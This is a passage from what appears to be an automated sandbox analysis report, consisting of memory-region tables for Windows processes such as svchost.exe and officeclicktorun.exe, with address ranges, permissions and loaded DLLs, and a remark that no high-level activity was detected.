- |
| private_0x000000b175bc0000 | 0xb175bc0000 | 0xb175bc6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b175c00000 | 0xb175c00000 | 0xb175cfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b175d00000 | 0xb175d00000 | 0xb175dfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b175e00000 | 0xb175e00000 | 0xb175efffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b175f00000 | 0xb175f00000 | 0xb175ffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b176000000 | 0xb176000000 | 0xb1760fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b176100000 | 0xb176100000 | 0xb1761fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b176200000 | 0xb176200000 | 0xb1762fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b176300000 | 0xb176300000 | 0xb176373fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b176400000 | 0xb176400000 | 0xb1764fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b176500000 | 0xb176500000 | 0xb1765fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b176600000 | 0xb176600000 | 0xb17667ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b176680000 | 0xb176680000 | 0xb17677ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b176780000 | 0xb176780000 | 0xb17687ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b176880000 | 0xb176880000 | 0xb17697ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b176980000 | 0xb176980000 | 0xb176a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b176a80000 | 0xb176a80000 | 0xb17727ffff | Private Memory | - |
|
|
|
- |
| private_0x000000b177280000 | 0xb177280000 | 0xb17737ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b177380000 | 0xb177380000 | 0xb17747ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b177500000 | 0xb177500000 | 0xb1775fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b177600000 | 0xb177600000 | 0xb1776fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b177700000 | 0xb177700000 | 0xb1777fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xb177800000 | 0xb177b36fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b177c00000 | 0xb177c00000 | 0xb177cfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b177d00000 | 0xb177d00000 | 0xb177dfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b177e00000 | 0xb177e00000 | 0xb177efffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b177f00000 | 0xb177f00000 | 0xb177ffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b178000000 | 0xb178000000 | 0xb1780fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b179200000 | 0xb179200000 | 0xb1792fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b179420000 | 0xb179420000 | 0xb17951ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b179520000 | 0xb179520000 | 0xb17961ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b179620000 | 0xb179620000 | 0xb17971ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b179720000 | 0xb179720000 | 0xb17981ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b179820000 | 0xb179820000 | 0xb17991ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b179920000 | 0xb179920000 | 0xb179926fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b1799a0000 | 0xb1799a0000 | 0xb1799a6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b179a00000 | 0xb179a00000 | 0xb179afffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b179b00000 | 0xb179b00000 | 0xb179bfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b179c00000 | 0xb179c00000 | 0xb179cfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b179d00000 | 0xb179d00000 | 0xb179f00fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b179f10000 | 0xb179f10000 | 0xb17a00ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b17a100000 | 0xb17a100000 | 0xb17a1fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b17a200000 | 0xb17a200000 | 0xb17a2fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b17a300000 | 0xb17a300000 | 0xb17a400fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b17a410000 | 0xb17a410000 | 0xb17a510fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b17a600000 | 0xb17a600000 | 0xb17a6fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff620000 | 0x7df5ff620000 | 0x7ff5ff61ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff67378e000 | 0x7ff67378e000 | 0x7ff67378ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673790000 | 0x7ff673790000 | 0x7ff673791fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673792000 | 0x7ff673792000 | 0x7ff673793fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673794000 | 0x7ff673794000 | 0x7ff673795fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673796000 | 0x7ff673796000 | 0x7ff673797fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67379c000 | 0x7ff67379c000 | 0x7ff67379dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67379e000 | 0x7ff67379e000 | 0x7ff67379ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737a0000 | 0x7ff6737a0000 | 0x7ff6737a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737a2000 | 0x7ff6737a2000 | 0x7ff6737a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737a4000 | 0x7ff6737a4000 | 0x7ff6737a5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737a6000 | 0x7ff6737a6000 | 0x7ff6737a7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737a8000 | 0x7ff6737a8000 | 0x7ff6737a9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737aa000 | 0x7ff6737aa000 | 0x7ff6737abfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737ac000 | 0x7ff6737ac000 | 0x7ff6737adfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737ae000 | 0x7ff6737ae000 | 0x7ff6737affff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737b0000 | 0x7ff6737b0000 | 0x7ff6737b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737b2000 | 0x7ff6737b2000 | 0x7ff6737b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737b4000 | 0x7ff6737b4000 | 0x7ff6737b5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737b8000 | 0x7ff6737b8000 | 0x7ff6737b9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737ba000 | 0x7ff6737ba000 | 0x7ff6737bbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737bc000 | 0x7ff6737bc000 | 0x7ff6737bdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737be000 | 0x7ff6737be000 | 0x7ff6737bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6737c0000 | 0x7ff6737c0000 | 0x7ff6738bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6738c0000 | 0x7ff6738c0000 | 0x7ff6738e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6738e4000 | 0x7ff6738e4000 | 0x7ff6738e5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6738e6000 | 0x7ff6738e6000 | 0x7ff6738e7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6738e8000 | 0x7ff6738e8000 | 0x7ff6738e8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6738ea000 | 0x7ff6738ea000 | 0x7ff6738ebfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6738ee000 | 0x7ff6738ee000 | 0x7ff6738effff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff673b40000 | 0x7ff673b4cfff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ff8df640000 | 0x7ff8dfaa9fff | Memory Mapped File | rwx |
|
|
|
- |
| radardt.dll | 0x7ff8e0270000 | 0x7ff8e028cfff | Memory Mapped File | rwx |
|
|
|
- |
| srumapi.dll | 0x7ff8e03b0000 | 0x7ff8e03c2fff | Memory Mapped File | rwx |
|
|
|
- |
| energyprov.dll | 0x7ff8e03d0000 | 0x7ff8e03e2fff | Memory Mapped File | rwx |
|
|
|
- |
| ncuprov.dll | 0x7ff8e0950000 | 0x7ff8e095cfff | Memory Mapped File | rwx |
|
|
|
- |
| wpnsruprov.dll | 0x7ff8e0960000 | 0x7ff8e096dfff | Memory Mapped File | rwx |
|
|
|
- |
| appsruprov.dll | 0x7ff8e0970000 | 0x7ff8e0986fff | Memory Mapped File | rwx |
|
|
|
- |
| eeprov.dll | 0x7ff8e0990000 | 0x7ff8e09aafff | Memory Mapped File | rwx |
|
|
|
- |
| nduprov.dll | 0x7ff8e09b0000 | 0x7ff8e09c4fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7ff8e0f70000 | 0x7ff8e0f7dfff | Memory Mapped File | rwx |
|
|
|
- |
| wlanapi.dll | 0x7ff8e15f0000 | 0x7ff8e164efff | Memory Mapped File | rwx |
|
|
|
- |
| esent.dll | 0x7ff8e1940000 | 0x7ff8e1c21fff | Memory Mapped File | rwx |
|
|
|
- |
| srumsvc.dll | 0x7ff8e1c30000 | 0x7ff8e1c67fff | Memory Mapped File | rwx |
|
|
|
- |
| diagperf.dll | 0x7ff8e25f0000 | 0x7ff8e2755fff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7ff8e2760000 | 0x7ff8e279efff | Memory Mapped File | rwx |
|
|
|
- |
| pnpts.dll | 0x7ff8e2eb0000 | 0x7ff8e2eb8fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ff8e3a50000 | 0x7ff8e3a59fff | Memory Mapped File | rwx |
|
|
|
- |
| wfapigp.dll | 0x7ff8e3a60000 | 0x7ff8e3a6bfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ff8e3c30000 | 0x7ff8e3fa5fff | Memory Mapped File | rwx |
|
|
|
- |
| mrmcorer.dll | 0x7ff8e5050000 | 0x7ff8e515efff | Memory Mapped File | rwx |
|
|
|
- |
| wdi.dll | 0x7ff8e5520000 | 0x7ff8e553cfff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x7ff8e5d70000 | 0x7ff8e5d77fff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x7ff8e5d80000 | 0x7ff8e5d87fff | Memory Mapped File | rwx |
|
|
|
- |
| wshqos.dll | 0x7ff8e5d90000 | 0x7ff8e5d99fff | Memory Mapped File | rwx |
|
|
|
- |
| dps.dll | 0x7ff8e5da0000 | 0x7ff8e5dcefff | Memory Mapped File | rwx |
|
|
|
- |
| adhapi.dll | 0x7ff8e6090000 | 0x7ff8e6099fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp110_win.dll | 0x7ff8e60a0000 | 0x7ff8e6131fff | Memory Mapped File | rwx |
|
|
|
- |
| policymanager.dll | 0x7ff8e6140000 | 0x7ff8e6178fff | Memory Mapped File | rwx |
|
|
|
- |
| httpprxc.dll | 0x7ff8e6180000 | 0x7ff8e6188fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpolicyiomgr.dll | 0x7ff8e6210000 | 0x7ff8e6244fff | Memory Mapped File | rwx |
|
|
|
- |
| mpssvc.dll | 0x7ff8e6250000 | 0x7ff8e6329fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ff8e6330000 | 0x7ff8e6365fff | Memory Mapped File | rwx |
|
|
|
- |
| bfe.dll | 0x7ff8e6370000 | 0x7ff8e6439fff | Memory Mapped File | rwx |
|
|
|
- |
| ucrtbase.dll | 0x7ff8e6c30000 | 0x7ff8e6d21fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp_win.dll | 0x7ff8e6d30000 | 0x7ff8e6dcafff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7ff8e7160000 | 0x7ff8e71c7fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ff8e7280000 | 0x7ff8e7299fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ff8e72a0000 | 0x7ff8e72b5fff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x7ff8e7cd0000 | 0x7ff8e7ce5fff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x7ff8e7f80000 | 0x7ff8e803ffff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 39 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #75: officeclicktorun.exe
0
0
| Information | Value |
|---|---|
| ID | #75 |
| File Name | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe |
| Command Line | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4e8 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
D3C
0x
D44
0x
CBC
0x
AF8
0x
B60
0x
72C
0x
728
0x
71C
0x
634
0x
5E4
0x
5D4
0x
544
0x
540
0x
538
0x
4EC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000d109c10000 | 0xd109c10000 | 0xd109c1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000d109c20000 | 0xd109c20000 | 0xd109c26fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d109c30000 | 0xd109c30000 | 0xd109c43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d109c50000 | 0xd109c50000 | 0xd109d4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d109d50000 | 0xd109d50000 | 0xd109d53fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d109d60000 | 0xd109d60000 | 0xd109d62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d109d70000 | 0xd109d70000 | 0xd109d71fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xd109d80000 | 0xd109e3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000d109e40000 | 0xd109e40000 | 0xd109e46fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d109e50000 | 0xd109e50000 | 0xd109e50fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d109e60000 | 0xd109e60000 | 0xd109e60fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d109e70000 | 0xd109e70000 | 0xd109e70fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d109e80000 | 0xd109e80000 | 0xd109f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d109f80000 | 0xd109f80000 | 0xd10a07ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d10a080000 | 0xd10a080000 | 0xd10a13ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d10a140000 | 0xd10a140000 | 0xd10a140fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d10a150000 | 0xd10a150000 | 0xd10a151fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d10a160000 | 0xd10a160000 | 0xd10a160fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000d10a170000 | 0xd10a170000 | 0xd10a171fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d10a180000 | 0xd10a180000 | 0xd10a184fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d10a190000 | 0xd10a190000 | 0xd10a190fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d10a1a0000 | 0xd10a1a0000 | 0xd10a1affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d10a1b0000 | 0xd10a1b0000 | 0xd10a337fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d10a340000 | 0xd10a340000 | 0xd10a4c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0xd10a4d0000 | 0xd10a806fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000d10a810000 | 0xd10a810000 | 0xd10a90ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10a910000 | 0xd10a910000 | 0xd10aa0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10aa10000 | 0xd10aa10000 | 0xd10ab0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10ab10000 | 0xd10ab10000 | 0xd10ac0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10ac10000 | 0xd10ac10000 | 0xd10ae0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10ae10000 | 0xd10ae10000 | 0xd10af0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10af10000 | 0xd10af10000 | 0xd10b00ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10b010000 | 0xd10b010000 | 0xd10b10ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10b110000 | 0xd10b110000 | 0xd10b216fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10b220000 | 0xd10b220000 | 0xd10b423fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10b430000 | 0xd10b430000 | 0xd10b52ffff | Private Memory | rw |
|
|
|
- |
| tdh.dll.mui | 0xd10b530000 | 0xd10b54afff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000d10b550000 | 0xd10b550000 | 0xd10b550fff | Pagefile Backed Memory | r |
|
|
|
- |
| kernelbase.dll.mui | 0xd10b560000 | 0xd10b63efff | Memory Mapped File | r |
|
|
|
- |
| msxml6r.dll | 0xd10b640000 | 0xd10b640fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000d10b650000 | 0xd10b650000 | 0xd10b656fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d10b660000 | 0xd10b660000 | 0xd10b660fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d10b670000 | 0xd10b670000 | 0xd10b670fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d10b680000 | 0xd10b680000 | 0xd10b680fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d10b690000 | 0xd10b690000 | 0xd10b690fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d10b6a0000 | 0xd10b6a0000 | 0xd10b6a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d10b6b0000 | 0xd10b6b0000 | 0xd10b6b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d10b6c0000 | 0xd10b6c0000 | 0xd10b6c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d10b6d0000 | 0xd10b6d0000 | 0xd10b6d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d10b6e0000 | 0xd10b6e0000 | 0xd10b6e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d10b6f0000 | 0xd10b6f0000 | 0xd10b6f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d10b700000 | 0xd10b700000 | 0xd10b700fff | Pagefile Backed Memory | rw |
|
|
|
- |
| counters.dat | 0xd10b710000 | 0xd10b710fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x000000d10b720000 | 0xd10b720000 | 0xd10b72ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10b730000 | 0xd10b730000 | 0xd10b82ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10b830000 | 0xd10b830000 | 0xd10ba2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10ba30000 | 0xd10ba30000 | 0xd10be2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10be30000 | 0xd10be30000 | 0xd10bf2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10bf30000 | 0xd10bf30000 | 0xd10c02ffff | Private Memory | rw |
|
|
|
- |
| winnlsres.dll | 0xd10c030000 | 0xd10c034fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0xd10c040000 | 0xd10c04ffff | Memory Mapped File | r |
|
|
|
- |
| mswsock.dll.mui | 0xd10c050000 | 0xd10c052fff | Memory Mapped File | r |
|
|
|
- |
| crypt32.dll.mui | 0xd10c070000 | 0xd10c079fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000d10c130000 | 0xd10c130000 | 0xd10c22ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10c230000 | 0xd10c230000 | 0xd10c32ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10c330000 | 0xd10c330000 | 0xd10c42ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10c430000 | 0xd10c430000 | 0xd10c52ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10c630000 | 0xd10c630000 | 0xd10c72ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10c730000 | 0xd10c730000 | 0xd10cb2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10cb30000 | 0xd10cb30000 | 0xd10d32ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10d330000 | 0xd10d330000 | 0xd10e2fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10e300000 | 0xd10e300000 | 0xd10e3fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d10ea30000 | 0xd10ea30000 | 0xd10f9fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d110210000 | 0xd110210000 | 0xd1111dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff1c0000 | 0x7df5ff1c0000 | 0x7ff5ff1bffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff649a4e000 | 0x7ff649a4e000 | 0x7ff649a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649a50000 | 0x7ff649a50000 | 0x7ff649a51fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649a52000 | 0x7ff649a52000 | 0x7ff649a53fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649a54000 | 0x7ff649a54000 | 0x7ff649a55fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649a56000 | 0x7ff649a56000 | 0x7ff649a57fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649a58000 | 0x7ff649a58000 | 0x7ff649a59fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649a5a000 | 0x7ff649a5a000 | 0x7ff649a5bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649a5c000 | 0x7ff649a5c000 | 0x7ff649a5dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649a5e000 | 0x7ff649a5e000 | 0x7ff649a5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff649a60000 | 0x7ff649a60000 | 0x7ff649b5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff649b60000 | 0x7ff649b60000 | 0x7ff649b82fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff649b83000 | 0x7ff649b83000 | 0x7ff649b84fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649b85000 | 0x7ff649b85000 | 0x7ff649b86fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649b87000 | 0x7ff649b87000 | 0x7ff649b87fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649b88000 | 0x7ff649b88000 | 0x7ff649b89fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649b8a000 | 0x7ff649b8a000 | 0x7ff649b8bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649b8c000 | 0x7ff649b8c000 | 0x7ff649b8dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff649b8e000 | 0x7ff649b8e000 | 0x7ff649b8ffff | Private Memory | rw |
|
|
|
- |
| officeclicktorun.exe | 0x7ff64a820000 | 0x7ff64b07bfff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x7ff8dcbd0000 | 0x7ff8dcc4ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x7ff8dff00000 | 0x7ff8e01a6fff | Memory Mapped File | rwx |
|
|
|
- |
| appvfilesystemmetadata.dll | 0x7ff8e0770000 | 0x7ff8e07bcfff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvsubsystemcontroller.dll | 0x7ff8e07c0000 | 0x7ff8e0945fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x7ff8e0a60000 | 0x7ff8e0bf6fff | Memory Mapped File | rwx |
|
|
|
- |
| appvintegration.dll | 0x7ff8e0c90000 | 0x7ff8e0ec0fff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvvirtualization.dll | 0x7ff8e0ed0000 | 0x7ff8e0f67fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7ff8e0f70000 | 0x7ff8e0f7dfff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x7ff8e0f80000 | 0x7ff8e0f94fff | Memory Mapped File | rwx |
|
|
|
- |
| appvcatalog.dll | 0x7ff8e0fa0000 | 0x7ff8e1049fff | Memory Mapped File | rwx |
|
|
|
- |
| appvmanifest.dll | 0x7ff8e1070000 | 0x7ff8e11a1fff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvstreamingmanager.dll | 0x7ff8e11b0000 | 0x7ff8e11e6fff | Memory Mapped File | rwx |
|
|
|
- |
| appvorchestration.dll | 0x7ff8e11f0000 | 0x7ff8e12dffff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x7ff8e12e0000 | 0x7ff8e12f6fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr120.dll | 0x7ff8e1300000 | 0x7ff8e13eefff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp120.dll | 0x7ff8e13f0000 | 0x7ff8e1495fff | Memory Mapped File | rwx |
|
|
|
- |
| appvpolicy.dll | 0x7ff8e14a0000 | 0x7ff8e15e0fff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvapi.dll | 0x7ff8e1700000 | 0x7ff8e177bfff | Memory Mapped File | rwx |
|
|
|
- |
| msxml6.dll | 0x7ff8e1c70000 | 0x7ff8e1ee6fff | Memory Mapped File | rwx |
|
|
|
- |
| msdelta.dll | 0x7ff8e1ef0000 | 0x7ff8e1f71fff | Memory Mapped File | rwx |
|
|
|
- |
| streamserver.dll | 0x7ff8e1f80000 | 0x7ff8e2367fff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7ff8e2760000 | 0x7ff8e279efff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x7ff8e2ea0000 | 0x7ff8e2ea9fff | Memory Mapped File | rwx |
|
|
|
- |
| mskeyprotect.dll | 0x7ff8e3170000 | 0x7ff8e3183fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ff8e3a50000 | 0x7ff8e3a59fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ff8e3c30000 | 0x7ff8e3fa5fff | Memory Mapped File | rwx |
|
|
|
- |
| ncryptsslp.dll | 0x7ff8e52f0000 | 0x7ff8e530efff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7ff8e5480000 | 0x7ff8e548bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ff8e57b0000 | 0x7ff8e5a23fff | Memory Mapped File | rwx |
|
|
|
- |
| msi.dll | 0x7ff8e5a30000 | 0x7ff8e5d6cfff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ff8e5dd0000 | 0x7ff8e5ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| apiclient.dll | 0x7ff8e5eb0000 | 0x7ff8e5ee9fff | Memory Mapped File | rwx |
|
|
|
- |
| rstrtmgr.dll | 0x7ff8e5ef0000 | 0x7ff8e5f21fff | Memory Mapped File | rwx |
|
|
|
- |
